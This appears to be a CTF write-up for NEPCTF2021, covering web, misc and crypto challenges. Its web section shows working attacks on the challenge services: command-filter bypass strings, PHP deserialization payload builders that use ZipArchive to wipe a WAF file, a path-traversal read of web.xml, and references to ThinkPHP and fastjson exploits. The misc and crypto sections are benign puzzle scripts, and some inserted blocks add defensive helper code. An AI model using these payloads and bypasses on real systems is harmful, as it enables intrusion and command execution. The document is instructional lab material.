NEPCTF2021

web

little_trick

A very simple command-execution filter bypass.

[screenshot]

The check uses substr(0,-1), i.e. it is applied to the input with the last character cut off, so:

echo`nl%20*`;

[screenshot]

梦里花开牡丹亭

<?php
highlight_file(__FILE__);
error_reporting(0);
include('shell.php');
class Game{
    public  $username;
    public  $password;
    public  $choice;
    public  $register;
    public  $file;
    public  $filename;
    public  $content;
    
    public function __construct()
    {
        $this->username='user';
        $this->password='user';
    }
    public function __wakeup(){
        if(md5($this->register)==="21232f297a57a5a743894a0e4a801fc3"){
            $this->choice=new login($this->file,$this->filename,$this->content);
        }else{
            $this->choice = new register();
        }
    }
    public function __destruct() {
        $this->choice->checking($this->username,$this->password);
    }
}
class login{
    public $file;
    public $filename;
    public $content;
    public function __construct($file,$filename,$content)
    {
        $this->file=$file;
        $this->filename=$filename;
        $this->content=$content;
    }
    public function checking($username,$password)
    {
        if($username==='admin'&&$password==='admin'){
            $this->file->open($this->filename,$this->content);
            die('login success you can to open shell file!');
        }
    }
}
class register{
    public function checking($username,$password)
    {
        if($username==='admin'&&$password==='admin'){
            die('success register admin');
        }else{
            die('please register admin ');
        }
    }
}
class Open{
    function open($filename, $content){
        if(!file_get_contents('waf.txt')){
            shell($content);
        }else{
            echo file_get_contents($filename.".php");
        }
    }
}
if($_GET['a']!==$_GET['b']&&(md5($_GET['a']) === md5($_GET['b'])) && (sha1($_GET['a'])=== sha1($_GET['b']))){
    @unserialize(base64_decode($_POST['unser']));
}

The chain in this code is not hard to find:

Game::__wakeup -> login::checking -> Open::open

First, let's see what is in shell.php.

exp1

<?php
class Game{
    public  $username;
    public  $password;
    public  $choice;
    public  $register;
    public  $file;
    public  $filename;
    public  $content;
    
    public function __construct()
    {
        $this->username='admin';
        $this->password='admin';
        $this->register='admin';
        $this->file=new Open();
        $this->filename="php://filter/read=convert.base64-encode/resource=shell";
        $this->content="ls";
    }
}
class login{
    public $file;
    public $filename;
    public $content;
}
class Open{
}
$b = new Login();
$c = new Game();
echo base64_encode(serialize($c));

?>

[screenshot]

It contains a command-execution filter that has to be bypassed.

To reach the shell() function, waf.txt must not exist (file_get_contents('waf.txt') has to return false).

[screenshot]

Searching around shows that a built-in PHP class with a method of the same name, open, can be used to wipe the file.

Explanation of the built-in class:

ZipArchive::open

This class can overwrite the file, emptying its contents.

exp2

<?php
class Game{
    public  $username;
    public  $password;
    public  $choice;
    public  $register;
    public  $file;
    public  $filename;
    public  $content;

    public function __construct()
    {
        $this->username='admin';
        $this->password='admin';
        $this->register='admin';
        $this->file=new ZipArchive();
        $this->filename="waf.txt";
        $this->content=ZIPARCHIVE::OVERWRITE;
    }
}
class login{
    public $file;
    public $filename;
    public $content;
}
class Open{
}
$b = new Login();
$c = new Game();
echo base64_encode(serialize($c));

?>

At this point waf.txt has been emptied.

Then bypass the command filter as before:

n\l /flag
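From the defender's side, the chain above works only because unserialize() is handed attacker-controlled input and is free to instantiate any class, including built-ins such as ZipArchive. As an added example (not from this writeup or the challenge), here is a small Python parser for PHP's serialize() format that lists every class a blob would instantiate, so an application can reject a base64-encoded `unser` value before it reaches unserialize(). The serialized sample it checks is constructed by hand to match what exp2 produces (ZipArchive::OVERWRITE is 8); the `allowed` allowlist is an assumption of the example.

```python
# Added example: parse PHP serialize() output and list the classes it names,
# so an unexpected class (e.g. ZipArchive) can be rejected up front.
import base64
from dataclasses import dataclass, field


class PHPSerializeError(ValueError):
    """Malformed or truncated serialized data."""


@dataclass
class PHPObject:
    cls: str
    props: dict = field(default_factory=dict)


def parse_php_serialized(data: bytes):
    """Return (value, class_names) for one serialize() blob.

    Scalars become Python scalars, arrays dicts, objects PHPObject.
    class_names lists every 'O:' class in document order, so objects nested
    in properties (a ZipArchive stored in $file) are reported as well.
    """
    classes = []
    pos = 0

    def expect(ch):
        nonlocal pos
        if data[pos:pos + 1] != ch:
            raise PHPSerializeError("expected %r at offset %d" % (ch, pos))
        pos += 1

    def read_until(ch):
        nonlocal pos
        end = data.index(ch, pos)  # ValueError if missing; wrapped below
        tok, pos = data[pos:end], end + 1
        return tok

    def read_quoted():
        # LEN:"bytes"  (LEN counts bytes, hence the parser works on bytes)
        nonlocal pos
        length = int(read_until(b":"))
        expect(b'"')
        raw = data[pos:pos + length]
        if len(raw) != length:
            raise PHPSerializeError("truncated string at offset %d" % pos)
        pos += length
        expect(b'"')
        return raw

    def read_members(count):
        members = {}
        for _ in range(count):
            key = parse_value()
            members[key] = parse_value()
        return members

    def parse_value():
        nonlocal pos
        tag = data[pos:pos + 1]
        pos += 1
        if tag == b"N":                      # N;
            expect(b";")
            return None
        expect(b":")
        if tag == b"b":                      # b:1;
            return read_until(b";") == b"1"
        if tag == b"i":                      # i:8;
            return int(read_until(b";"))
        if tag == b"d":                      # d:1.5;
            return float(read_until(b";"))
        if tag == b"s":                      # s:5:"admin";
            raw = read_quoted()
            expect(b";")
            return raw.decode("latin-1")
        if tag == b"a":                      # a:N:{key;value;...}
            count = int(read_until(b":"))
            expect(b"{")
            members = read_members(count)
            expect(b"}")
            return members
        if tag == b"O":                      # O:4:"Game":7:{...}
            name = read_quoted().decode("latin-1")
            classes.append(name)
            expect(b":")
            count = int(read_until(b":"))
            expect(b"{")
            obj = PHPObject(name, read_members(count))
            expect(b"}")
            return obj
        raise PHPSerializeError("unknown tag %r at offset %d" % (tag, pos - 1))

    try:
        value = parse_value()
    except (ValueError, IndexError) as exc:
        raise PHPSerializeError(str(exc)) from exc
    if pos != len(data):
        raise PHPSerializeError("trailing data at offset %d" % pos)
    return value, classes


def unexpected_classes(unser_b64: str, allowed=frozenset()):
    """Classes the blob would instantiate that are not on the allowlist (assumed policy)."""
    _, classes = parse_php_serialized(base64.b64decode(unser_b64))
    return sorted(set(classes) - set(allowed))


# Constructed sample: the Game object exp2 above serializes, with a ZipArchive in
# $file, "waf.txt" as $filename and ZipArchive::OVERWRITE (8) as $content.
SAMPLE = (
    b'O:4:"Game":7:{s:8:"username";s:5:"admin";s:8:"password";s:5:"admin";'
    b's:6:"choice";N;s:8:"register";s:5:"admin";s:4:"file";O:10:"ZipArchive":0:{}'
    b's:8:"filename";s:7:"waf.txt";s:7:"content";i:8;}'
)
SAMPLE_B64 = base64.b64encode(SAMPLE).decode()
```

Running `unexpected_classes(SAMPLE_B64, allowed={"Game"})` yields `['ZipArchive']`, which is the signal to drop the request. In PHP itself the equivalent in-process control is the `allowed_classes` option of unserialize(); the real fix for this code is not to unserialize user input at all and to carry the login state in a plain JSON structure instead.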

[screenshot]

fake_revenge

[screenshot]

After downloading the source it turns out to be the ThinkPHP framework, so the known payload works directly.

[screenshot]

Some functions are disabled.

[screenshot]

passthru is still usable.

Just cat the flag.

[screenshot]

easy_tomcat

The site requires a login.

[screenshot]

Tried weak passwords and SQL injection without result, so I scanned directories.

[screenshot]

Register and log in.

[screenshot]

There is a head_path parameter, which may allow arbitrary file read.

[screenshot]

Bypass using an absolute path combined with traversal:

[screenshot]

static/img/../../WEB-INF/web.xml

A comment in the page source says to try admin. [screenshot]

[screenshot]

Read LoginServelet.class; after base64 decoding it is this stuff. Then look at InitServlet, the initialization servlet.

[screenshot]

[screenshot]

The admin password is visible:

admin/no_one_knows_my_password_75767388428345

After logging in, the previously registered accounts are listed and can be deleted.

The delete request sends JSON, and the AdminServlet class read earlier happens to contain fastjson code.

[screenshot]

[screenshot]

vn had just put out one of these not long ago:

https://blog.csdn.net/SopRomeo/article/details/114945759?spm=1001.2014.3001.5501

No bypass is needed at all.

[screenshot]

[screenshot]

misc

签到

Just loop over the data and print each value in binary.

# -*- coding: utf-8 -*-
# @File   : test
# @Author : penson <penson@penson.top>
# @Email: decentpenson@gmail.com
# @Date   : 2021/3/20 10:58
# each value is one 128-pixel-wide row of the picture, one bit per pixel
flag = [0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffffbffffffffffff,0xfffffffffffffffffff9ffffffffffff,0xfffffffffffffffffff5f0001fffffff,0xfffffffffffffffe000407ffcfffffff,0xfffffffffffffff8fffffffff7ffffff,0xfffffffffffffff3fffffffff3ffffff,0xffffffffffffffcffffffffffbffffff,
        0xffffffffffffffdffffffffffbffffff,0xffffffffffffffdffffffffffbffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffdffffff,0xfffffffffffffffffffffffffcffffff,0xfffffffffffffffffffffffffcffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffff0000ffffffffffff,0xfffffffffffffffe7fff1f9fffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffe1fffffffffffdffffffffffff,0xffffff8cfffffffffffdffffffffffff,0xfff03fbf7ffffffffffbffffffffffff,0xffe79f3f3ffffffffffbffffffffffff,0xffefde7fbffffffffffbffffffffffff,0xffefeeff9ffffffffffbffffffffffff,0xffefe6ffdffffffffff9ffffffffffff,0xffcff6ffdffffffffffcffffffffffff,0xffdffaffcffffffffffe3fffffffffff,0xffdff8ffefffffffffff800fffffffff,0xffdff9ffefffffffffff0fffffffffff,0xffdffdffeffffffffffc7fffffffffff,0xffdffffff7fffffffff3ffffffffffff,0xffdffffff7fffffffff7ffffffffffff,0xffdffffff7ffffffffffffffffffffff,0xffdfff9fffffffffffffff7fffffffff,0xffffffbfffffffffffffff3fffffffff,0xffffff7ffffffffffffc1fbfffffffff,0xffffff7ffffffffffff9df9fffffffff,0xffffff7ffffffffffffbdfdfffffffff,0xffffff7ffffffffffffbdfdfffffffff,0xffffff9ffffffffffffbdf9fffffffff,0xffffffcffffffffffffbdfbfffffffff,0xffffffe3fffffffffffbdfbfffffffff,0xffffffc007fffffffffbdf3fffffffff,0xffffff1f83fffffffff9df7fffffffff,0xfffffe7ffffffffffffcdcffffffffff,0xfffffefffffffffffffe01ffffffffff,0xffffffffffffffffffffdfffffffffff,0xffffffffffffffffffffdfffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffff3ffffffffffffffffffffff,0xfffffff3e7ffffffffffffffffffffff,0xffffffc78ffffffffff8ffffffffffff,0xffffffb03fffffffffff3fffffffffff,0xffffff23ffffffffffff87ffffffffff,0xffffff787ffffffffffff0ffffffffff,0xffffff7f9ffffffffffffc7fffffffff,
        0xffffff7fc7fffffffffff1ffffffffff,0xffffff7ff3ffffffffffc7ffffffffff,0xffffffbffbffffffffff1fffffffffff,0xffffffcffbfffffffffcffffffffffff,0xffffffe7e7ffffffffe1ffffffffffff,0xfffffff80fffffffffefffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffe3ffffffffff,0xfffffffffffffffff01f89ffffffffff,0xffffffffffffffffc7cf3cffffffffff,0xffffffffffffffff9fee7effffffffff,0xfffffffffbffffff3ff6feffffffffff,0xfffffffffbffffff7ff2fe7fffffffff,0xfffffffffbffffff7ffaff7fffffffff,0xfffffffffbfffffefff8ff7fffffffff,0xfffffffffbfffffefffcff7fffffffff,0xfffffffffbfffffefffcff3fffffffff,0xfffffffffbfffffefffcffbfffffffff,0xfffffffffbfffffeffffffbfffffffff,0xfffffffffbffffffffffffbfffffffff,0xfffffffffbffffffffffffbfffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbfffffc00ffffffffffffff,0xfffffffffbfffffbff00001fffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffbffffffffffffffffffffff,0xfffffffffffffffffffdfcffffffffff,0xfffffffffffffffffffbfeffffffffff,0xfffffffffffffffffff3fe7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffffffffffffff7ff7fffffffff,0xfffffffe1ffffffffff7ff7fffffffff,0xfffffff0fffffffffff7ff7fffffffff,0xffffff8ffffffffffff7feffffffffff,0xfffffff3fffffffffff9f0ffffffffff,0xfffffffcfffffffffffe07ffffffffff,0xfffffffe7fffffffffffffffffffffff,0xffffffff7fffffffffffffffffffffff,0xffffffffbfffffffffffffffffffffff,0xffffffffbfffffffffffffffffffffff,0xffffffff7fffffffffffffffffffffff,0xfffffffe7fffffffffffffffffffffff,0xffffffc0ffffffffffffffffffffffff,
        0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xff8001fffffffffffffffff7ffffffff,0xffbffc00fffffffffffffff7ffffffff,0xff7ffffe1ffffffffffffff7ffffffff,0xff7fffffcffffffffffffff7ffffffff,0xff7fffffe7fffffffffffff7ffffffff,0xff3ffffff3fffffffffffff7ffffffff,0xffbffffffbfffffffffffff7ffffffff,0xff7ffffff3fffffffffffff7ffffffff,0xff83ffffe7fffffffffffff7ffffffff,0xfff83fffcffffffffffffff7ffffffff,0xffff80003ffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xffbffffffffffffffffffff7ffffffff,0xff9ffffffffffffffffffff7ffffffff,0xffdffffffffffffffffffff7ffffffff,0xffeffffffffffffffffffff7ffffffff,0xffeffffffffffffffffffff7ffffffff,0xfff7fffffffffffffffffff7ffffffff,0xfff7fffffffffffffffffff7ffffffff,0xfffbfffffffffffffffffff7ffffffff,0xfff9fffffffffffffffffff7ffffffff,0xfffdfffffffffffffffffff7ffffffff,0xfffcfffffffffffffffffff7ffffffff,0xfffefffffffffffffffffff7ffffffff,0xfffe7ffffffffffffffffff7ffffffff,0xffff3ffffffffffffffffff7ffffffff,0xffffbfffffffffffffffffffffffffff,0xffffbfffffffffffffffffffffffffff,0xffff9f003fffffffffffffffffffffff,0xffffc07f83ffffffffffffffffffffff,0xffff9fffffffffff8000001fffffffff,0xffff3fffffffffff3fffffcfffffffff,0xfffe7ffffffffffe7fffffe7ffffffff,0xfffcfffffffffffcfffffff3ffffffff,0xfff9fffffffffffc1ffffff3ffffffff,0xfff3fffffffffffe7fffffc7ffffffff,0xffe7ffffffffffff03ffe01fffffffff,0xffdffffffffffffff8000fffffffffff,0xff3fffffffffffffffffffffffffffff,0xfe7fffffffffffffffffffffffffffff,0xf8ffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffeffffffffffffffff,0xfffffffffffffffefffe03ffffffffff,0xffffffffffffffff7ffcf8ffffffffff,0xfbffffffffffffff7ff9feffffffffff,0xf3ffffffffffffff7ff3ff7fffffffff,
        0xe7ffffffffffffffbff7ffbfffffffff,0xefffffffffffffffbff7ffbfffffffff,0xefffffffffffffffbff7ffdfffffffff,0xeffffffffcffffffbff7ffdfffffffff,0xeffffffffeffffffbff7ffdfffffffff,0xe7fffc0ffeffffffbff7ffcfffffffff,0xf3fff9e07effffffbff7ffefffffffff,0xf80017ff80ffffffbff7ffefffffffff,0xffffd7ffffffffff0037ffefffffffff,0xffffc7ffffffffffffc3ffefffffffff,0xffffefffffffffffffffffefffffffff,0xffffefffffffffffffffffcfffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffe03fffffffffffffffffffffffff,0xffffcf9fffffffffffffffffffffffff,0xffff9fdffffffffffffffff7ffffffff,0xffffbfdffffffffffffffff7ffffffff,0xffffbfcffffffffffffffff7ffffffff,0xffff3feffffffffffffffff7ffffffff,0xffff7feffffffffffffffff7ffffffff,0xffff7feffffffffffffffff7ffffffff,0xffff000000007ffffffffff7ffffffff,0xffffbffffffe7ffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xffffffdffffffffffffffff7ffffffff,0xffffffcffffffffffffffff7ffffffff,0xffff07effffffffffffffff7ffffffff,0xffff73effffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff7beffffffffffffffff7ffffffff,0xffff9bcffffffffffffffff7ffffffff,0xffffc3dffffffffffffffff7ffffffff,0xfffff01ffffffffffffffff7ffffffff,0xfffffffffffffffffffffff7ffffffff,0xfcfffffffffffffffffffff7ffffffff,0xfe1ffffffffffffffffffff7ffffffff,0xffe0fffffffffffffffffff7ffffffff,0xfffe07fffffffffffffffff7ffffffff,0xfffff00ffffffffffffffff7ffffffff,0xffffffeffffffffffffffff7ffffffff,0xffffff8ffffffffffffffff7ffffffff,0xfffffe3ffffffffffffffff7ffffffff,0xfffff8ffffffffffffffffffffffffff,0xffffe3ffffffffffffffffffffffffff,0xfffe1fffffffffffffffffffffffffff,0xffc0ffffffffffffffffffffffffffff,0xfc1fffffffffffffffffffffffffffff,
        0xfc7fffffffffffffffffffffffffffff,0xff807fffffffffffffffffffffffffff,0xffff01ffffffffffffffffffffffffff,0xfffffc07ffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff,0xffffffffffffffffffffffffffffffff]
for i in flag:
    print("{:0128b}".format(i))  # zero-pad to 128 bits so every row has the same width
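The script prints each row with a bare binary format, which lines up here only because every row begins with a 1 bit; a row starting with 0 would come out shorter and shift the picture sideways. As an added example (not the author's code), this renderer pads every row to a fixed width and draws the 0 bits as `#`, since in this data the all-ones rows are the background; the sample rows are constructed for the demonstration.

```python
# Added example (not the writeup's code): render bit-packed pixel rows as text.
def render_bitmap(rows, width=None, ink="0"):
    """One text line per row; bits equal to `ink` become '#', others ' '.

    width defaults to the smallest multiple of 8 that fits the widest row.
    Every row is zero-padded to that width, so a row whose leading bits are
    0 keeps its length (a bare "{:b}" would drop them and shift the row).
    The challenge data uses all-1 rows as background, hence ink="0".
    """
    if width is None:
        width = (max((r.bit_length() for r in rows), default=8) + 7) // 8 * 8
    lines = []
    for r in rows:
        bits = format(r, "0%db" % width)
        lines.append("".join("#" if b == ink else " " for b in bits))
    return lines


def crop_blank(lines):
    """Drop leading and trailing rows that carry no ink."""
    while lines and not lines[0].strip():
        lines = lines[1:]
    while lines and not lines[-1].strip():
        lines = lines[:-1]
    return lines


# Constructed 8-pixel-wide sample: a blank row, a letter 'T', then a blank row.
SAMPLE_ROWS = [0xFF, 0x81, 0xE7, 0xE7, 0xE7, 0xFF]

if __name__ == "__main__":
    for line in crop_blank(render_bitmap(SAMPLE_ROWS)):
        print(line)
```

For the challenge data you would call `render_bitmap(flag, width=128)`; the explicit width is what keeps the picture aligned regardless of each row's leading bits.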

Read the characters off the picture. [screenshot]

出题人日记

After renaming the file to .zip, there are characters inside.

[screenshot]

Caesar cipher.

[screenshot]

Search for JS image steganography:

JS steganography

JS steganography tool download

Decode this image and you get it.

[screenshot]

crypto

Real_Base

As a web person, it was quite pleasing to solve a crypto challenge for the first time. The challenge is not hard: it gives the source of a base64 variant, and once you understand how base64 encoding works and then read the code, the decoding script is easy to write.

I have put the analysis in the source code comments.

# -*- coding: utf-8 -*-
# @File   : RealBase
# @Author : penson <penson@penson.top>
# @Email: decentpenson@gmail.com
# @Date   : 2021/3/21 19:34
# py2
import string
import random
# from secret import flag, b_char
def encode(s):
    res = ''
    binstr = [bin(ord(s[i])).replace('0b', '').zfill(8) for i in range(len(s))]  # each byte as 8 bits
    p1 = len(binstr) // 3
    p2 = len(binstr) % 3
    for i in range(p1):
        str_p1 = binstr[i * 3] + binstr[i * 3 + 1] + binstr[i * 3 + 2]
        tmp_str = [str_p1[x: x + 6] for x in [0, 6, 12, 18]]  # split the 24 bits into four 6-bit groups
        tmp_res = [b_char[int(x, 2)] for x in tmp_str]  # each 6-bit value is an index into b_char
        res += ''.join(tmp_res)
    if p2:
        part2 = binstr[3 * p1:]   # the trailing bytes that do not fill a group of 3
        str_p2 = ''.join(part2) + (3 - p2) * '0' * 8   # pad with zero bytes
        tmp_str = [str_p2[x: x + 6] for x in [0, 6, 12, 18]][:p2 + 1]  # 6-bit groups, keep only p2+1 of them
        tmp_res = [b_char[int(x, 2)] for x in tmp_str]  # 6-bit value -> index into b_char
        res += ''.join(tmp_res)
        res += '=' * (3 - p2)   # one '=' per dropped group, like standard base64
    return res
def decode(m):
    m = m.replace('=', '')
    text = ''
    for i in m:
        text += bin(b_char.index(i)).replace('0b', '').zfill(6)  # symbol -> its 6-bit index in b_char
    # regroup into whole bytes; the few leftover padding bits are dropped
    binstr = [text[j:j + 8] for j in range(0, len(text) - len(text) % 8, 8)]
    flag = ''.join(chr(int(i, 2)) for i in binstr)
    print flag
    return flag


b_char = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/"
m1 = 'rTcb1BR8YVW2EOUjweXpIiLt5QCNg7ZAsD9muq3ylMhvofnx/P'
# print len(m1)
m = encode(m1)
decode("tCvM4R3TzvZ7nhjBxSiNyxmP28e7qCjVxQn91SRM3gBKzxQ=")
# print encode(flag)
# print len("rTcb1BR8YVW2EOUjweXpIiLt5QCNg7ZAsD9muq3ylMhvofnx/P")
# print len("2Br9y9fcu97zvB2OruZv0D3Bwhbj0uNQnvfdtC2TwAfPrdBJ3xeP4wNn0hzLzCVUlRa=")
# tCvM4R3TzvZ7nhjBxSiNyxmP28e7qCjVxQn91SRM3gBKzxQ=
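The challenge's "variant" differs from standard base64 only in the alphabet b_char, so the general tool is a codec that takes the alphabet as a parameter. As an added example (not the author's script), here is a Python 3 implementation that handles any input length, validates the alphabet and the padding, and can re-map an encoded string between two alphabets without decoding it at all; PAGE_ALPHABET and CHALLENGE_CIPHERTEXT are copied from the script above, everything else is constructed for the example.

```python
# Added example: base64 with a caller-supplied 64-symbol alphabet.
import base64

STANDARD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# b_char from the challenge source (same symbols as standard base64, permuted)
PAGE_ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ+/"
# ciphertext quoted in the writeup's script
CHALLENGE_CIPHERTEXT = "tCvM4R3TzvZ7nhjBxSiNyxmP28e7qCjVxQn91SRM3gBKzxQ="


def _check_alphabet(alphabet):
    if len(alphabet) != 64 or len(set(alphabet)) != 64 or "=" in alphabet:
        raise ValueError("alphabet must be 64 distinct symbols and must not contain '='")


def custom_b64_encode(data, alphabet=STANDARD_ALPHABET):
    """3 bytes -> 4 symbols; a short final group is zero-padded and marked with '='."""
    _check_alphabet(alphabet)
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        pad = 3 - len(chunk)                       # 0, 1 or 2 missing bytes
        n = int.from_bytes(chunk + b"\x00" * pad, "big")   # one 24-bit group
        sextets = [(n >> s) & 0x3F for s in (18, 12, 6, 0)]
        out.append("".join(alphabet[x] for x in sextets[:4 - pad]) + "=" * pad)
    return "".join(out)


def custom_b64_decode(text, alphabet=STANDARD_ALPHABET):
    """Inverse of custom_b64_encode; rejects bad symbols, length and padding."""
    _check_alphabet(alphabet)
    index = {c: i for i, c in enumerate(alphabet)}
    body = text.rstrip("=")
    pad = len(text) - len(body)
    if len(text) % 4 or pad > 2:
        raise ValueError("length must be a multiple of 4 with at most two '='")
    acc = nbits = 0
    out = bytearray()
    for c in body:
        if c not in index:
            raise ValueError("symbol %r is not in the alphabet" % c)
        acc = (acc << 6) | index[c]                # append 6 bits
        nbits += 6
        if nbits >= 8:                             # a whole byte is available
            nbits -= 8
            out.append((acc >> nbits) & 0xFF)
            acc &= (1 << nbits) - 1                # keep only the leftover bits
    return bytes(out)                              # trailing padding bits are dropped


def retarget(text, src_alphabet, dst_alphabet):
    """Move an encoded string to another alphabet without decoding: pure substitution."""
    _check_alphabet(src_alphabet)
    _check_alphabet(dst_alphabet)
    return text.translate(str.maketrans(src_alphabet, dst_alphabet))


def matches_stdlib(data):
    """With the standard alphabet the codec must agree with base64.b64encode."""
    return custom_b64_encode(data) == base64.b64encode(data).decode()


if __name__ == "__main__":
    print(custom_b64_encode(b"hello world", PAGE_ALPHABET))
    print(len(custom_b64_decode(CHALLENGE_CIPHERTEXT, PAGE_ALPHABET)), "bytes in the challenge ciphertext")
```

`retarget` is the quickest way to recognise an alphabet-only variant: translate the unknown string into the standard alphabet and hand it to the stock decoder; if that produces readable output, nothing beyond the substitution was changed.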

Author: penson
Link: https://www.penson.top
Copyright: unless stated otherwise, all posts on this blog are licensed under CC BY 4.0. Please credit penson when reposting.